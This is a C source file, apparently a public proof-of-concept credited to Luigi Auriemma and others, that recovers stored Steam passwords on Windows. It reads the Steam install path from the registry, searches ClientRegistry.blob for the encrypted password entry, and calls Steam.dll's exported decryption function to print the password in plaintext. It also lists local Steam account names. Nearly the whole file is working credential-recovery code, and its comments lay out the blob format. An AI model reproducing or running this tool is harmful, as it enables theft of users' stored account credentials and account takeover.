Luigi Auriemma

// DecryptStoredSteamPassword.c by wizard
//
// Combines Luigi's ClientRegistry.blob parsing function(s)
// with VALVe's exported SteamDecryptDataForThisMachine() function
//
// small code changes and comments added by desxor
// again some changes and fuctions were added by Five-Three-Nine


#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <sys/stat.h>
#include <windows.h>

void GetSteamDic(char *Path);

void SteamParseEncryptedPassPhrase(uint8_t *fname);
uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str);

typedef int (__cdecl *SteamDecryptDataForThisMachine_t)(char *a, int b, char *c, int d, int *e);
SteamDecryptDataForThisMachine_t SteamDecryptDataForThisMachine;


   /* Find Steam Dir */
   char SteamPath[100] = {};
   char SteamDll[100] = {};
   char SteamBlob[100] = {};
   char SteamUser[100] = {};
HANDLE hSteamDLL;

int main(int argc, char *argv[]) {

   GetSteamDic(SteamPath);
   strcat(SteamDll,SteamPath);
   strcat(SteamDll,"\\Steam.dll");

   strcat(SteamBlob,SteamPath);
   strcat(SteamBlob,"\\ClientRegistry.blob");

   strcat(SteamUser,SteamPath);
   strcat(SteamUser,"\\SteamApps\\*");

   printf("%s\n%s\n%s\n%s\n\n",SteamPath,SteamDll,SteamBlob,SteamUser);

   hSteamDLL = LoadLibrary(SteamDll);
   if(!hSteamDLL) {
      printf("\nError: the file STEAM.DLL has not been found.\n");
      exit(1);
   }

   SteamDecryptDataForThisMachine = (void *)GetProcAddress(hSteamDLL, "SteamDecryptDataForThisMachine");
   if(!SteamDecryptDataForThisMachine) {
      printf("\nError: the function SteamDecryptDataForThisMachine has not been found.\n");
      exit(1);
   }

   SteamParseEncryptedPassPhrase(SteamBlob);

   FreeLibrary(hSteamDLL);


   /* Addon: Find Steam Users */
   printf("\nSteam User Names:\n");
   HANDLE fHandle;
   WIN32_FIND_DATA wfd;

   fHandle=FindFirstFile(SteamUser,&wfd);

   do
   {
      if (!( (wfd.cFileName[0]=='.') && ( (wfd.cFileName[1]=='.' && wfd.cFileName[2]==0) || wfd.cFileName[1]==0 ) ))
      {
         if (wfd.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY)
         {
            if((strcmp(wfd.cFileName,"SourceMods") != 0) && (strcmp(wfd.cFileName,"common") != 0))
            {
               printf("%s\n",wfd.cFileName);
            }

         }
      }
   }
   while (FindNextFile(fHandle,&wfd));
   FindClose(fHandle);

   return(0);
}

void SteamParseEncryptedPassPhrase(uint8_t *fname) {
   int len, fdsize, pwds;
   uint16_t nlen;
   uint8_t *fdbuff, *fdnext, *p, *buff;
   char decpass[100];
   struct stat xstat;
   FILE *fd;

   fd = fopen(fname, "rb");
   if(!fd) {
      printf("Could not open %s for reading/memory search.\n", fname);
      exit(1);
   } else {
      fstat(fileno(fd), &xstat);
      fdbuff = malloc(xstat.st_size);

   if(!fdbuff) {
      printf("Could not allocate file into memory.\n");

      // comments for the following are pretty much the same as below so look there for
      // a more detailed description of what's going on

      len = strlen(fname);
      fdsize = 64 + len;

      fdbuff = malloc(fdsize);

        p = fdbuff;
        p += sprintf(p, "%-30s", "\x50\x68\x72\x61\x73\x65\x01\x50");

        *(uint16_t *)p = 0;
        p += 2;

        *(uint32_t *)p = len;
        p += 4 + 0;

        strcpy(p, fname);

        fclose(fd);
        goto next;
      }

   // load our file into memory for searching and reading its data
   fread(fdbuff, 1, xstat.st_size, fd);
   fclose(fd);

   fdsize = xstat.st_size;
   }

   next:
      fdnext = fdbuff;
      for(pwds = 0;; pwds++) {
      // search for unique phrase text using memcmp(), using a great little function provided by Luigi A.
      // his function will search the entire allocated memory for the data you specify and return with it
      // if its found, otherwise null

         p = find_data(fdnext, fdsize, "\x50\x68\x72\x61\x73\x65\x01\x50");

         if(!p) {
            if(pwds) break;
            printf("An encrypted and stored password could not be located, exiting.\n");
            exit(1);
            }

      // skip 30 bytes past the PHRASE text to the encrypted password until we come
      // to "04 00" or simply 4, (0x04 + (0x00 * 256)), we now have 24 bytes remaining
      p += 30;

      // this is the 16 bit number we are looking for, save it in the following format:
      // num = byte1 + (byte2 * 256)
      nlen = *(uint16_t *)p;

      // skip the next 2 bytes of the 16bit number we just saved
      p += 2;

      // after we skipped 2 bytes, we come to 32bit number (4 bytes) which should always be the
      // size of our encrypted string, it should appear as "5c 00 00 00", which equals 0x5c or simply, 92
      // save this in the same format as before
      len  = *(uint32_t *)p;

      // now we skip the 4 bytes that we _just read_ PLUS the amount of bytes specified by the first
      // 16 bit number we just saved, should be 2 bytes anyhow
      // this should now bring us to our encrypted password located in ClientRegistry.blob which should be
      // 92 (0x5c) characters long
      p += 4 + nlen;

      // an example of the data, provided by Luigi:
      // 50 68 72 61 73 65 01 50 7e 00 00 00 00 00 00 00   Phrase.P~.......
      // 04 00 04 00 00 00 01 00 00 00 02 00 00 00 04 00   ................
      // 5c 00 00 00 02 00 00 00 39 41 46 41 42 44 39 36   \.......9AFABD96
      // 32 30 43 45 43 34 39 31 46 38 33 44 43 45 31 32   20CEC491F83DCE12
      // 36 33 33 44 39 43 44 41 41 44 45 30 42 36 46 46   633D9CDAADE0B6FF
      // 41 32 42 42 45 30 31 32 45 38 39 32 37 33 36 39   A2BBE012E8927369
      // 35 32 35 37 43 44 43 45 39 35 37 32 41 37 30 38   5257CDCE9572A708
      // 38 42 32 43 41 43 30 33 37 44 43 38 33 33 36 33   8B2CAC037DC83363
      // 33 33 35 35 12 00 2a 00 00 00 43 6c 6f 63               3355..*...Cloc

      fdsize -= (p - fdnext);
      fdnext = p;

      // as long as our length is greater than zero but no bigger than fdsize, execute the exported decryption function
        if((len > 0) && (len < fdsize)) {
         // null terminate the end of our string, otherwise it will cause problems
         p[len] = 0;

         printf("Found stored encrypted password:\n \"%s\"\n\n", p);

         if(!SteamDecryptDataForThisMachine(p, strlen(p), decpass, sizeof(decpass), &len)) {
            printf("Password: %.*s\n\n", len, decpass);
         } else {
            printf("Unable to decrypt the stored password, is this the same machine it was encrypted on?\n");
         }
        }
      }

   free(fdbuff);
}

uint8_t *find_data(uint8_t *buff, int buffsz, uint8_t *str) {
   int strsz;
   uint8_t *limit;

   strsz = strlen(str);
   limit = buff + buffsz - strsz;

   for(; buff <= limit; buff++) {
      if(!memcmp(buff, str, strsz)) return(buff);
   }

return(NULL);
}

void GetSteamDic(char *Path) {
   HKEY hKey;
   DWORD size;

   RegOpenKey(HKEY_LOCAL_MACHINE, "Software\\Valve\\Steam", &hKey);
   RegQueryValueEx(hKey, "InstallPath", NULL, NULL,Path, &size);
   RegCloseKey(hKey);
}